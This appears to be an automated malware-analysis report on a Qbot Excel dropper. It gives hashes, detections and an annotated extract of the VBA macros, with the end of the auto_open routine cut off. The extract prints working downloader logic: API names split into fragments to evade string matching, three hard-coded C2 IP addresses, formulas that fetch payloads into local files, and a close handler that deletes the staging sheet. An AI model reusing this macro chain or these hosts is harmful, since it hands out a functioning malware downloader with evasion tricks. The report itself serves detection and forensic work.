Qbot — Office (OLE) malware analysis

Static analysis result for SHA-256 c7e1cf54edf4f251…

MALICIOUS

Office (OLE)

582.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2021-11-20
MD5: 61767e1cb0b286c0da3fa6bd97a8313e SHA-1: 11bd3dcc842cfd44f88bc7e461338ec371e278b4 SHA-256: c7e1cf54edf4f2510a72019631610ff25a3fc7dd0648e0acabaf0bd31d3272ee
120 Risk Score

Malware Insights

Qbot · confidence 95%

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature 'Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0', strongly suggesting it belongs to the Qbot family. The presence of an Auto_Open VBA macro indicates that the malicious code executes automatically when the document is opened, likely to download and execute a secondary payload. The extracted VBA source is heavily obfuscated and the preview is truncated, which prevents a detailed analysis of its specific actions beyond the auto-execution trigger.

Heuristics 3

  • ClamAV: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6356 bytes
SHA-256: 5a1bec0ff40495f6baf830ac55f3a751a709d970905bf82cecc0a57cdaad37d3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ThisWorkbook code module as decoded by olevba. It holds two UI-looking
' procedures (applyLogosToDashboard, InitWorkbook) and a BeforeClose handler
' that deletes the "Nneeri" sheet the other modules write into.
Option Explicit

' Declared here but never read or written anywhere in the visible listing.
Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean
' Toggles logo/button shapes on the "Dashboard" sheet depending on whether
' Excel reports a Mac operating system. The sheet password is read from
' cell IV1 rather than being hard-coded.
' NOTE(review): nothing in this procedure touches the "Nneeri" sheet or the
' download cells; it reads like carried-over template code (a decoy) — confirm
' against the full sample before treating it as part of the payload chain.
Public Sub applyLogosToDashboard()

Application.ScreenUpdating = False

If Not Application.OperatingSystem Like "*Mac*" Then

    ' Windows branch: unprotects Dashboard with the password held in Logos!IV1 ...
    Sheets("Dashboard").Activate
    Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1")
    ActiveSheet.Shapes("Apple_Logo").Visible = False
    ActiveSheet.Shapes("Win_Logo").Visible = True
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = True
    ActiveSheet.Shapes("Button_Print_PDF").Visible = True
    ActiveSheet.Shapes("Button_Save_As").Visible = True
    ActiveSheet.Shapes("Button_Help").Visible = True
    ActiveSheet.Shapes("Button_Versions").Visible = True
    ' ... but then protects the *Logos* sheet, not Dashboard (asymmetric with the Else branch).
    Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True

Else

    ' Mac branch: hides the Windows-only buttons and re-protects Dashboard.
    Sheets("Dashboard").Activate
    Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1")
    ActiveSheet.Shapes("Apple_Logo").Visible = True
    ActiveSheet.Shapes("Win_Logo").Visible = False
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
    ActiveSheet.Shapes("Button_Print_PDF").Visible = False
    ActiveSheet.Shapes("Button_Save_As").Visible = False
    Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True

End If

    Application.ScreenUpdating = True

End Sub



' Closes the workbook without saving if the host Excel is older than
' version 12 (Excel 2007), otherwise shows a form named frmMain.
' frmMain is not part of the extracted source, and no caller of InitWorkbook
' appears in the visible listing (auto_open at the end of the preview is
' truncated) — treat this as unverified decoy/template code.
Private Sub InitWorkbook()
    If VBA.Val(Application.Version) < 12 Then
        MsgBox "This Workbook requires Excel 2007 or later!", vbCritical, "Closing"
        Me.Close False
        Exit Sub
    End If
    '
    With New frmMain
        .Show
        'Other code
        '
        '
        '
    End With
End Sub

' Workbook close handler: silently deletes the "Nneeri" sheet — the same
' sheet that Module1–Module4 populate with the download URLs, file paths and
' formulas. Errors and the deletion prompt are suppressed, so the removal
' leaves no trace if the user then saves.
' Forensics note: analyse the original attachment, not a copy that was
' opened and re-saved; the working sheet may already be gone from the latter.
Private Sub Workbook_BeforeClose(Cancel As Boolean)


On Error Resume Next
   ' DisplayAlerts = False suppresses the "permanently delete this sheet?" prompt.
   Application.DisplayAlerts = False
   Sheets("Nneeri").Delete
   Application.DisplayAlerts = True
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sheet1 code module: attributes only, no procedures in the extracted source.

Attribute VB_Name = "Module1"

' Writes three formulas into Nneeri!H10:H12. A string starting with "="
' assigned to a Range is stored as a formula, so Excel evaluates these as
' =Kopast(0, <url>, <destination file>, 0, 0) once the sheet is calculated:
'   H24..H26 = "http://" & <ip>/   (set in dfgdf, Module4)
'   K17      = "=NOW()"            (set in Retio, Module2)
'   K18      = ".dat"              (set in Retio, Module2)
'   G10..G12 = "..\Lifas.ver*"     (set in Nyrtyfh, Module3)
' NOTE(review): the five-argument shape and the cells I9="uRlMon" /
' I10="URLDownloadToFileA" / I12="Kopast" written elsewhere are consistent
' with Kopast being an Excel 4.0 REGISTER alias for urlmon!URLDownloadToFileA,
' but the REGISTER call itself is not in the visible listing (Biolaster,
' kjhkjlkj and auto_open are missing or truncated) — confirm on the full sample.
' Declared as a Function but returns nothing; it is used as a Sub.
Function Hrosters()



Sheets("Nneeri").Range("H10") = "=Kopast(0,H24&K17&K18,G10,0,0)"
Sheets("Nneeri").Range("H11") = "=Kopast(0,H25&K17&K18,G11,0,0)"
Sheets("Nneeri").Range("H12") = "=Kopast(0,H26&K17&K18,G12,0,0)"

End Function

 

Attribute VB_Name = "Module2"
' Assembles the strings "uRlMon" (I9) and "URLDownloadToFileA" (I10) from
' fragments and stores them in the hidden sheet, along with a timestamp
' formula (K17), a ".dat" suffix (K18) and "=HALT()" (H35, an Excel 4.0
' macro-sheet terminator). Splitting the API/DLL names across variables
' presumably defeats naive string matching on the VBA source; the
' concatenated values only exist in the sheet cells at runtime.
' Module2 has no Option Explicit, so net/net1/dff/dff1 are implicit Variants.
' Calls Diopaster (Module3) before writing, and kjhkjlkj at the end —
' kjhkjlkj is not present in the visible listing.
' Declared as a Function but returns nothing; it is used as a Sub.
Function Retio()

net = "uR"
net1 = "Mon"
dff = "URLDownload"
dff1 = "ToFileA"
Diopaster

' "uR" & "l" & "Mon" -> "uRlMon" (urlmon.dll, case-insensitive)
Sheets("Nneeri").Range("I9") = net & "l" & net1
Sheets("Nneeri").Range("K18") = ".dat"


Sheets("Nneeri").Range("K17") = "=NOW()"
Sheets("Nneeri").Range("H35") = "=HALT()"
' "URLDownload" & "ToFileA" -> "URLDownloadToFileA"
Sheets("Nneeri").Range("I10") = dff & dff1

kjhkjlkj



End Function





Attribute VB_Name = "Module3"

' Setup step called from Retio: disables screen updating (never re-enabled
' here), calls Biolaster (not in the visible listing), stores the name
' "Kopast" in Nneeri!I12, hides the "Nneeri" sheet, then runs Nyrtyfh
' (destination paths) and dfgdf (download URLs).
' Visible = False is xlSheetHidden, not xlSheetVeryHidden, so the sheet can
' still be found via Format > Sheet > Unhide or any OLE/xlsx parser.
' Declared as a Function but returns nothing; it is used as a Sub.
Function Diopaster()
Application.ScreenUpdating = False
Biolaster
Sheets("Nneeri").Range("I12") = "Kopast"

Sheets("Nneeri").Visible = False
Nyrtyfh
dfgdf
End Function


' Stores the three download destination paths in Nneeri!G10:G12. They are
' relative ("..\"), so the actual drop directory depends on Excel's current
' directory when the formulas in Hrosters are evaluated. The file names
' "Lifas.ver", "Lifas.ver1", "Lifas.ver2" are host-based IoCs to hunt for.
' Declared as a Function but returns nothing; it is used as a Sub.
Function Nyrtyfh()

Sheets("Nneeri").Range("G10") = "..\Lifas.ver"
Sheets("Nneeri").Range("G11") = "..\Lifas.ver1"
Sheets("Nneeri").Range("G12") = "..\Lifas.ver2"

End Function


Attribute VB_Name = "Module4"




' Stores the three download hosts in Nneeri!H24:H26, each prefixed with
' "http://" (plain HTTP — network IoCs: 111.90.150.195, 185.106.120.116,
' 51.89.115.115). Hrosters later appends the NOW() timestamp and ".dat" to
' each of these to form the request URL.
' The final line paints A1:M100 black, which hides cell contents from a
' casual viewer but not from any parser reading the sheet data.
' dgdgerwrh is an implicit Variant (no Option Explicit in Module4).
' Declared as a Function but returns nothing; it is used as a Sub.
Function dfgdf()

dgdgerwrh = "http://"

Sheets("Nneeri").Range("H24") = dgdgerwrh & "111.90.150.195/"
Sheets("Nneeri").Range("H25") = dgdgerwrh & "185.106.120.116/"
Sheets("Nneeri").Range("H26") = dgdgerwrh & "51.89.115.115/"
Sheets("Nneeri").Range("A1:M100").Interior.Color = vbBlack

End Function









Attribute VB_Name = "Module6"






Sub auto_open()
Set 
... (truncated)